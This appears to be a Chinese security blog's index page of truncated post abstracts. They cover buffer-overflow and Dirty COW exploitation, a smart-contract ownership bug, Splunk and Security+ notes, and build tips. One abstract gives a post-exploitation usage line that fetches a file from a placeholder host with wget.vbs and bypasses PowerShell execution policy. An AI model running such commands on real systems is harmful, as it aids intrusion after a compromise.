摘要:
学习Linux BOF的时候,看了这个文章,https://sploitfun.wordpress.com/2015/06/23/integer overflow/ ,原文给出的exp无法成功, 此时除了计算并填充buf还可以用其他方法来复现这个问题: !/usr/bin/env python im 阅读全文
摘要:
Wget like tool for file transfer when do post exploitation. CODE USAGE cscript wget.vbs http://x.x.x.x filename powershell.exe ExecutionPolicy bypass 阅读全文
摘要:
先写个大概 0. dirtycow 不同的dirtycow有不同执行条件。 使用前先对照此表根据内核版本确认是否已经修复 https://github.com/dirtycow/dirtycow.github.io/wiki/Patched Kernel Versions 比如 https://gi 阅读全文
摘要:
Moesif Origin & CORS Changer 这个插件允许发送跨域请求,重写Request Origin 和 CORS headers。 解决Debug Javascript时候出现blocked by CORS policy日志问题。 下载地址 Moesif Origin & CORS 阅读全文
摘要:
Security+ Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA;是和CISSP、CISA等共同包含在内的国际IT业热门认证之一,和CISSP偏重信息安全管理相比,Security+认证更偏重信息安全技术和操作。 考试资料 1. Security+ St 阅读全文
摘要:
课程介绍 | 通过 Splunk Fundamentals Part 1 课程考试 | 获取splunk certificate user 证书 | 课程为14节课+课后实验环境+课后习题 | 课程有英文中文日语字幕可选 | 考试为45道题,60分钟 | 免费。 | 通过 Splunk Fundam 阅读全文
摘要:
学习Splunk Fundamentals Part 2 (IOD) 和 Splunk Fundamentals Part 1课程的笔记。 Chart Over By Tips: ….|chart count over host by product_name usenull=f useother= 阅读全文
摘要:
有大佬通过博客加我了,分享技术还是有人会看到的,要坚持更新博客,感谢! 过去的一年多总结 这一年多在甲方做了DevOps还有Security两个岗位,白天忙着撕逼晚上做技术性的活,这一年多不论技术和业务都学了很多。 考了EX413,学会SELinux配置奇怪安全策略,配置奇怪的Windows组策略, 阅读全文
摘要:
漏洞原因: 因为initWallet函数是公开函数( public function) , 攻击者调用initWallet,重新初始化钱包会把之前合约钱包所有者覆盖, 即可改变钱包所有者。 漏洞代码: 修复方法: 设置 initMultiowned 和 initDaylimit 禁止外部调用,给in 阅读全文
摘要:
在构建自定义ISO的时候,有时候需要从母体机器拷贝文件到Live CD系统。比如拷贝/home/xiaoxiaoleo/hello 程序,在Kickstart配置文件里, post脚本添加--nochroot参数: 启动机器,加载Live IOS进入系统后,可以在系统目录/app/里看到hello程 阅读全文